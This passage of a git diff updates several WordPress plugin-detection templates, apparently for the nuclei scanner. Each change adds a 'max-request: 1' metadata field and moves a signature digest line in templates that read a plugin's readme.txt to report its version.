490a0046304402204d1251f5b7d6556cc909ee66b939b1c7b33ac1419366031a935b56ee6650cee102204c9bf80fb49ac8d2759010028ac5b999c61193a3e064271bb11ab0584762ec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204d1251f5b7d6556cc909ee66b939b1c7b33ac1419366031a935b56ee6650cee102204c9bf80fb49ac8d2759010028ac5b999c61193a3e064271bb11ab0584762ec9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 873dee82a8..62c477691b 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220623f6c10b67a593245ec74ef6af8ec04187e3c3f5f1e461054764ce92fcdd00d022029834a82390df5e2740b3db0ba98c25685a66a56c1e82d09c035e4ddff4d885b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220623f6c10b67a593245ec74ef6af8ec04187e3c3f5f1e461054764ce92fcdd00d022029834a82390df5e2740b3db0ba98c25685a66a56c1e82d09c035e4ddff4d885b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 4afea468d3..b00f7c3ed4 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203da0d1030d67f46a79614b7ccdaa9d43b8cdf254f2964622bbb1df4b911a550c022100d5439a6c3f2eac13b23eca375ca650d5052f47125af6ff6ab3c7d57d21a6a0a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203da0d1030d67f46a79614b7ccdaa9d43b8cdf254f2964622bbb1df4b911a550c022100d5439a6c3f2eac13b23eca375ca650d5052f47125af6ff6ab3c7d57d21a6a0a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 95dc9d8699..58514bea3d 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a300954552ab0adc8f54a358a00b8a4ee1ca781300b4f2ba67c04228f6151bf02205a3ba9bc507795d6656b51e0cbed84913e245fcac01b6a23739abaaa6fe0578e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204a300954552ab0adc8f54a358a00b8a4ee1ca781300b4f2ba67c04228f6151bf02205a3ba9bc507795d6656b51e0cbed84913e245fcac01b6a23739abaaa6fe0578e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 897d031ecc..633372d8cd 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e5d5a4fda900f44f5eea40711d1101d6a9c17d888d636f22d05dac17bd0df0f02210083672987cf3308dac6bc2fa28cc35a9e4a24d78524d23291098542b919bd0c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009e5d5a4fda900f44f5eea40711d1101d6a9c17d888d636f22d05dac17bd0df0f02210083672987cf3308dac6bc2fa28cc35a9e4a24d78524d23291098542b919bd0c45:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index a8200bbccc..9348a77367 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d3875de519dcb1af43843ed9ad690f7628abdd35f06d714d6593520499257cb022100d21163fb7d822be5752532bb33d2c6178e9333ef44043f756a8a3bffe09a051c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202d3875de519dcb1af43843ed9ad690f7628abdd35f06d714d6593520499257cb022100d21163fb7d822be5752532bb33d2c6178e9333ef44043f756a8a3bffe09a051c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 2d82a476db..3ea3de0756 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012a771fbe75ecfbed562373413d3c5e1a34b4658ca5d0d81eb944e6bfa4048060220260f7eee3c535fb57788d8f7f5b1d6f089aad99393ae61c36cc9d6928c074cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022012a771fbe75ecfbed562373413d3c5e1a34b4658ca5d0d81eb944e6bfa4048060220260f7eee3c535fb57788d8f7f5b1d6f089aad99393ae61c36cc9d6928c074cb4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 447987d547..b015de815f 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5cd7a36081b4021c1417a4fcae3c17a4814396a1818e56d022354ca957d62a102210082dbd04bbeb542fa6fbe33f29be99c75e8542da81c4632a4ef9913710ab3a823:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f5cd7a36081b4021c1417a4fcae3c17a4814396a1818e56d022354ca957d62a102210082dbd04bbeb542fa6fbe33f29be99c75e8542da81c4632a4ef9913710ab3a823:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index a7dae1f4fd..f023aaf91c 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f7b364303cc1c412bcdc775149305ab446a01b406de392df65fe0b8a6621e2702206731b35b9265dc8e96ed99f25b356a556e95cfde6bcd0c073fb0fb81d9ac20b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207f7b364303cc1c412bcdc775149305ab446a01b406de392df65fe0b8a6621e2702206731b35b9265dc8e96ed99f25b356a556e95cfde6bcd0c073fb0fb81d9ac20b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 84c5b0ad00..5125989a3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f18fb63c091ad717eaaaa3abaaa56949b1840637fc4f6a72e57af81baecdeee022100e3233ec816a48c6d1b72229585ad8cb9485837d1e50a0b815d76606f8b6da3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205f18fb63c091ad717eaaaa3abaaa56949b1840637fc4f6a72e57af81baecdeee022100e3233ec816a48c6d1b72229585ad8cb9485837d1e50a0b815d76606f8b6da3d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4dd4004d0c..2608f89194 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e552b30dc45ab03f8ff8bb513bb75939198c9c47fc7b719bc823386b90d3959102204eb278b4aafbd9a6b7771a923e5a0026172f1bfbce2bbcd46abd16e4bf93c9e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e552b30dc45ab03f8ff8bb513bb75939198c9c47fc7b719bc823386b90d3959102204eb278b4aafbd9a6b7771a923e5a0026172f1bfbce2bbcd46abd16e4bf93c9e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 29b43248d0..c977acb993 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d4e9d4f412666d0d435c4eecc09e3da7a2b14970b478dff444b34317f0e304002210099133864b533055dcf9829e3aa7471e27b639c92fd84a1bbe35b6ffcb61a9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201d4e9d4f412666d0d435c4eecc09e3da7a2b14970b478dff444b34317f0e304002210099133864b533055dcf9829e3aa7471e27b639c92fd84a1bbe35b6ffcb61a9ea2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index cc02142a3b..0f85ef1f9c 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c4e5a1c3c089fccb91a553d40a59ccb4ee9e46b271e962dbd733fec6e056ddb02200e56dedb98e908503f8a80e2eda83220f7d430beaca6f21613fce9730e246405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201c4e5a1c3c089fccb91a553d40a59ccb4ee9e46b271e962dbd733fec6e056ddb02200e56dedb98e908503f8a80e2eda83220f7d430beaca6f21613fce9730e246405:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 2fabefd41f..1137463fce 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081c1d7523b7068173e5305c6cc5f1d2fbf653c48746258493fe6347892bd9f3c0221008b54d6e99c7cef1061fdce38c61c9204a49b3e54b09353175000c10e312331ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210081c1d7523b7068173e5305c6cc5f1d2fbf653c48746258493fe6347892bd9f3c0221008b54d6e99c7cef1061fdce38c61c9204a49b3e54b09353175000c10e312331ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index eca2fd6f90..bb4d7b94f1 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c2591f7f54a86e06a1ed8b06e00e6680e968027015d2582a6fa4119c9ae6a5a022100e203276eb8fc24fa62b04f867487e0d74982c8ce676af7ca87f353baf09fdd29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205c2591f7f54a86e06a1ed8b06e00e6680e968027015d2582a6fa4119c9ae6a5a022100e203276eb8fc24fa62b04f867487e0d74982c8ce676af7ca87f353baf09fdd29:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 87b21676d0..0da9f9f6e2 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5d239fd8a57406f52a1ce990a872d11d561ff990846ce3134359ac8af7fefeb022100a8040c957a0c5565c09ccbd4bf082f75c5c2f65b93f79dbded883d4aa82011c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c5d239fd8a57406f52a1ce990a872d11d561ff990846ce3134359ac8af7fefeb022100a8040c957a0c5565c09ccbd4bf082f75c5c2f65b93f79dbded883d4aa82011c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index b02a018e5e..0812e7d08e 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa48c1c7493f0ae1d898b1b27d9aa511452086a8341d26e25ddf8cccd614eaad022017efb9468118a567b0b14007098585c888653cd8bf52d7df9a8c65b368e79286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fa48c1c7493f0ae1d898b1b27d9aa511452086a8341d26e25ddf8cccd614eaad022017efb9468118a567b0b14007098585c888653cd8bf52d7df9a8c65b368e79286:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 159c97d39a..a84734b32e 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008329befa72cac3d2ed932242a20827d01373a3fa9591c4d35e7ae149badd2cc0022020b18f02212dfc4850d7212358ec91d01a3bc921a6e1d51601d31eb43f660abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008329befa72cac3d2ed932242a20827d01373a3fa9591c4d35e7ae149badd2cc0022020b18f02212dfc4850d7212358ec91d01a3bc921a6e1d51601d31eb43f660abc:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index a9b10c60c4..108da9ce84 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220289f0dab3ee5cedbc60ce7ff276558b78ede7faab53e33b3943d2144e11e4e130220489634c10d55f70b0250fdfc84995e4d2724bd8c3dc0c9716eb22d551c502e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220289f0dab3ee5cedbc60ce7ff276558b78ede7faab53e33b3943d2144e11e4e130220489634c10d55f70b0250fdfc84995e4d2724bd8c3dc0c9716eb22d551c502e15:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index dd35a47625..e13ec85f79 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220295bcb7504a30dfbc85d0f0fad5af53ccbb1a2ef852d16a5523d9ec0192c5d2402207b719acef31a8cc940bb2f6ca05695e28f14a876c138abcf86cc7fdee7190ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220295bcb7504a30dfbc85d0f0fad5af53ccbb1a2ef852d16a5523d9ec0192c5d2402207b719acef31a8cc940bb2f6ca05695e28f14a876c138abcf86cc7fdee7190ff8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 58319f5782..4b3db970f8 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5bbc8f81ec077da1169307f04d11332d3e50549275766eaf31a78fa7265b1f70221009370bb8e9e830666c96ece74a6c8044aa4c59fd301093b8812442652e4066b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a5bbc8f81ec077da1169307f04d11332d3e50549275766eaf31a78fa7265b1f70221009370bb8e9e830666c96ece74a6c8044aa4c59fd301093b8812442652e4066b27:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1ff35d6b2f..57a1bd17a7 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a46a58b97d68e80f1c576fbcba884aba89ac2a74be009275e52bcd827c72c033022100e9f8ee43ab4c5090288b94d1a131c3a4e694410b2dba26dc3d74a6c07a668a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a46a58b97d68e80f1c576fbcba884aba89ac2a74be009275e52bcd827c72c033022100e9f8ee43ab4c5090288b94d1a131c3a4e694410b2dba26dc3d74a6c07a668a14:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 70b304598a..f94b0046c1 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220457192ef200e7331664554f7e071b74d203cd7d98284934b8393711dea969ad40220059905cb12ebc88ec4eaddb5d160d943d8990e2030f02a52d7bc984a89ddf182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220457192ef200e7331664554f7e071b74d203cd7d98284934b8393711dea969ad40220059905cb12ebc88ec4eaddb5d160d943d8990e2030f02a52d7bc984a89ddf182:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 220bd8a8cb..0594f4da7a 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039302ad029bf5a1b0fe26044b91c634f228b10569b8da8682256400b4285644a02205f228bd0531741fbbcc22a1c48aa73272b54e288c9c85cf7bdfe5b4a9ac6f1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022039302ad029bf5a1b0fe26044b91c634f228b10569b8da8682256400b4285644a02205f228bd0531741fbbcc22a1c48aa73272b54e288c9c85cf7bdfe5b4a9ac6f1bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index f560de805a..d87a9e1dfb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd14b52f925105d1a3b208fb725e8f8da596f8360ddbe9790bb987b340fba730022100b111dd8a4c58f1a2bf3cbad3d75e7a811e1a3e239c92522ccf8d77e5f4792896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bd14b52f925105d1a3b208fb725e8f8da596f8360ddbe9790bb987b340fba730022100b111dd8a4c58f1a2bf3cbad3d75e7a811e1a3e239c92522ccf8d77e5f4792896:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b297de24db..7135d9de4f 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 